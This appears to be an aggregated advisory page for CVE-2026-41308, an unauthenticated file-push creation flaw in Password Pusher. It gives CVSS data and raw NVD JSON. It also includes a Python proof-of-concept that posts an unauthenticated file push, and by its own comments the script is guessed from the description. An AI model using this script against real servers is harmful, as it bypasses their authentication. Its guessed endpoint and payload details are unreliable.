Security Vulnerability Report
中文
CVE-2026-41308 CVSS 6.5 MEDIUM

CVE-2026-41308

Published: 2026-05-08 15:16:39
Last Modified: 2026-05-08 16:08:16
Source: [email protected]

Description

Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Password Pusher < 1.69.3
Password Pusher < 2.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target configuration target_host = "http://vulnerable-host.com" api_endpoint = "/p.json" # Generic JSON API create path mentioned in description # Construct the payload for a file-type push # Based on the description, the vulnerability allows unauthenticated file push creation payload = { "password": { "payload": "<base64_encoded_file_content>", "note": "Unauthorized File Upload", "type": "file" } } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-41308-Scanner" } print(f"[*] Attempting to exploit {target_host}{api_endpoint}...") try: # Send POST request without authentication response = requests.post(target_host + api_endpoint, data=json.dumps(payload), headers=headers, timeout=10) if response.status_code == 201 or response.status_code == 200: print("[+] Exploit successful! File push created without authentication.") print("[+] Response:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41308", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:39.480", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/pglombardo/PasswordPusher/commit/45dc2512875231ef45ecd5dfc8c3c8185f882bf4", "source": "[email protected]"}, {"url": "https://github.com/pglombardo/PasswordPusher/pull/4381", "source": "[email protected]"}, {"url": "https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-qfh8-f79c-x86c", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.